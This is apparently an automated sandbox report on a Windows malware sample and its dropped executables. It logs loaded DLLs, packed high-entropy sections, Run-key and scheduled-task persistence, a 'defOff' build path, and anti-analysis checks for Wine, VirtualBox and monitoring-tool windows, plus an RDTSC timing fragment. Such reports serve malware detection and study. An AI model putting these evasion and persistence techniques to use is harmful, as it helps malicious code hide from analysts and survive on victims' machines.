Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: winmm.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: sspicli.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: wininet.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: ncrypt.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: ntasn1.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: iertutil.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: windows.storage.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: wldp.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: profapi.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: winhttp.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: mswsock.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: winnsi.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: urlmon.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: srvcli.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: h3yRbjNWk1.exe Static file information: File size 1866752 > 1048576
Source: h3yRbjNWk1.exe Static PE information: Raw size of mjkoefrk is bigger than: 0x100000 < 0x196000
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 4af6eb3e1f.exe, 0000000C.00000003.2595479701.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, 4af6eb3e1f.exe, 0000000C.00000002.2730540172.0000000000312000.00000040.00000001.01000000.0000000B.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Unpacked PE file: 0.2.h3yRbjNWk1.exe.7c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mjkoefrk:EW;ikspwnpi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mjkoefrk:EW;ikspwnpi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.a50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mjkoefrk:EW;ikspwnpi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mjkoefrk:EW;ikspwnpi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.a50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mjkoefrk:EW;ikspwnpi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mjkoefrk:EW;ikspwnpi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.a50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mjkoefrk:EW;ikspwnpi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mjkoefrk:EW;ikspwnpi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Unpacked PE file: 7.2.ea2c7beae0.exe.b30000.0.unpack :EW;.rsrc :W;.idata :W;lfmcaccf:EW;srlszley:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;lfmcaccf:EW;srlszley:EW;.taggant:EW;
Source: C:\Users\user\1000350002\6a8d4317d4.exe Unpacked PE file: 8.2.6a8d4317d4.exe.d20000.0.unpack :EW;.rsrc :W;.idata :W; :EW;nsvghvat:EW;rciruuiw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;nsvghvat:EW;rciruuiw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Unpacked PE file: 12.2.4af6eb3e1f.exe.310000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vnhbgiry:EW;hdcovdvs:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\1000350002\6a8d4317d4.exe Unpacked PE file: 14.2.6a8d4317d4.exe.d20000.0.unpack :EW;.rsrc :W;.idata :W; :EW;nsvghvat:EW;rciruuiw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;nsvghvat:EW;rciruuiw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Unpacked PE file: 16.2.ea2c7beae0.exe.b30000.0.unpack :EW;.rsrc :W;.idata :W;lfmcaccf:EW;srlszley:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;lfmcaccf:EW;srlszley:EW;.taggant:EW;
Source: C:\Users\user\1000350002\6a8d4317d4.exe Unpacked PE file: 17.2.6a8d4317d4.exe.d20000.0.unpack :EW;.rsrc :W;.idata :W; :EW;nsvghvat:EW;rciruuiw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;nsvghvat:EW;rciruuiw:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: 6a8d4317d4.exe.6.dr Static PE information: real checksum: 0x1d976d should be: 0x1d4104
Source: random[1].exe.6.dr Static PE information: real checksum: 0x2dc1a9 should be: 0x2db2ec
Source: num.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: real checksum: 0x1d976d should be: 0x1d4104
Source: h3yRbjNWk1.exe Static PE information: real checksum: 0x1ce593 should be: 0x1d487a
Source: random[1].exe1.6.dr Static PE information: real checksum: 0x1b2d2b should be: 0x1ab3a2
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: real checksum: 0x1ce593 should be: 0x1d487a
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1ce593 should be: 0x1d487a
Source: ea2c7beae0.exe.6.dr Static PE information: real checksum: 0x2dc1a9 should be: 0x2db2ec
Source: random[1].exe0.6.dr Static PE information: real checksum: 0x1d976d should be: 0x1d4104
Source: num[1].exe.6.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: 4af6eb3e1f.exe.6.dr Static PE information: real checksum: 0x1b2d2b should be: 0x1ab3a2
Source: h3yRbjNWk1.exe Static PE information: section name:
Source: h3yRbjNWk1.exe Static PE information: section name: .idata
Source: h3yRbjNWk1.exe Static PE information: section name:
Source: h3yRbjNWk1.exe Static PE information: section name: mjkoefrk
Source: h3yRbjNWk1.exe Static PE information: section name: ikspwnpi
Source: h3yRbjNWk1.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: mjkoefrk
Source: skotes.exe.0.dr Static PE information: section name: ikspwnpi
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name: lfmcaccf
Source: random[1].exe.6.dr Static PE information: section name: srlszley
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: ea2c7beae0.exe.6.dr Static PE information: section name:
Source: ea2c7beae0.exe.6.dr Static PE information: section name: .rsrc
Source: ea2c7beae0.exe.6.dr Static PE information: section name: .idata
Source: ea2c7beae0.exe.6.dr Static PE information: section name: lfmcaccf
Source: ea2c7beae0.exe.6.dr Static PE information: section name: srlszley
Source: ea2c7beae0.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .rsrc
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: nsvghvat
Source: random[1].exe0.6.dr Static PE information: section name: rciruuiw
Source: random[1].exe0.6.dr Static PE information: section name: .taggant
Source: 6a8d4317d4.exe.6.dr Static PE information: section name:
Source: 6a8d4317d4.exe.6.dr Static PE information: section name: .rsrc
Source: 6a8d4317d4.exe.6.dr Static PE information: section name: .idata
Source: 6a8d4317d4.exe.6.dr Static PE information: section name:
Source: 6a8d4317d4.exe.6.dr Static PE information: section name: nsvghvat
Source: 6a8d4317d4.exe.6.dr Static PE information: section name: rciruuiw
Source: 6a8d4317d4.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: .idata
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: vnhbgiry
Source: random[1].exe1.6.dr Static PE information: section name: hdcovdvs
Source: random[1].exe1.6.dr Static PE information: section name: .taggant
Source: 4af6eb3e1f.exe.6.dr Static PE information: section name:
Source: 4af6eb3e1f.exe.6.dr Static PE information: section name: .idata
Source: 4af6eb3e1f.exe.6.dr Static PE information: section name:
Source: 4af6eb3e1f.exe.6.dr Static PE information: section name: vnhbgiry
Source: 4af6eb3e1f.exe.6.dr Static PE information: section name: hdcovdvs
Source: 4af6eb3e1f.exe.6.dr Static PE information: section name: .taggant
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name:
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name: .rsrc
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name: .idata
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name:
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name: nsvghvat
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name: rciruuiw
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name: .taggant
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: section name:
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: section name: .idata
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: section name:
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: section name: mjkoefrk
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: section name: ikspwnpi
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A6D91C push ecx; ret 6_2_00A6D92F
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A4E521 push eax; retf 11_3_00A4E53D
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A49500 pushfd ; ret 11_3_00A49501
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A56A78 push 000000A5h; iretd 11_3_00A56A82
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A49348 push ebp; ret 11_3_00A49349
Source: h3yRbjNWk1.exe Static PE information: section name: entropy: 7.978806357998039
Source: h3yRbjNWk1.exe Static PE information: section name: mjkoefrk entropy: 7.953119223352716
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.978806357998039
Source: skotes.exe.0.dr Static PE information: section name: mjkoefrk entropy: 7.953119223352716
Source: random[1].exe.6.dr Static PE information: section name: entropy: 7.972434411391327
Source: ea2c7beae0.exe.6.dr Static PE information: section name: entropy: 7.972434411391327
Source: random[1].exe0.6.dr Static PE information: section name: nsvghvat entropy: 7.953578874486692
Source: 6a8d4317d4.exe.6.dr Static PE information: section name: nsvghvat entropy: 7.953578874486692
Source: random[1].exe1.6.dr Static PE information: section name: entropy: 7.8017228103971235
Source: random[1].exe1.6.dr Static PE information: section name: vnhbgiry entropy: 7.952943091917195
Source: 4af6eb3e1f.exe.6.dr Static PE information: section name: entropy: 7.8017228103971235
Source: 4af6eb3e1f.exe.6.dr Static PE information: section name: vnhbgiry entropy: 7.952943091917195
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name: nsvghvat entropy: 7.953578874486692
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: section name: entropy: 7.978806357998039
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: section name: mjkoefrk entropy: 7.953119223352716
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\1000350002\6a8d4317d4.exe
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File created: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File created: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000401001\num.exe
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File created: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6a8d4317d4.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ea2c7beae0.exe
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: Regmonclass
Source: C:\Users\user\1000350002\6a8d4317d4.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000350002\6a8d4317d4.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000350002\6a8d4317d4.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\1000350002\6a8d4317d4.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\1000350002\6a8d4317d4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 82EFE0 second address: 82E87C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F97B4EC49C4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop ecx 0x00000010 pop eax 0x00000011 nop 0x00000012 stc 0x00000013 push dword ptr [ebp+122D0C8Dh] 0x00000019 mov dword ptr [ebp+122D2716h], edi 0x0000001f call dword ptr [ebp+122D1C25h] 0x00000025 pushad 0x00000026 mov dword ptr [ebp+122D2716h], edx 0x0000002c xor eax, eax 0x0000002e jmp 00007F97B4EC49BDh 0x00000033 cmc 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 jng 00007F97B4EC49C0h 0x0000003e mov dword ptr [ebp+122D2AD5h], eax 0x00000044 mov dword ptr [ebp+122D2716h], edi 0x0000004a mov esi, 0000003Ch 0x0000004f jmp 00007F97B4EC49BBh 0x00000054 cld 0x00000055 add esi, dword ptr [esp+24h] 0x00000059 stc 0x0000005a jc 00007F97B4EC49B7h 0x00000060 lodsw 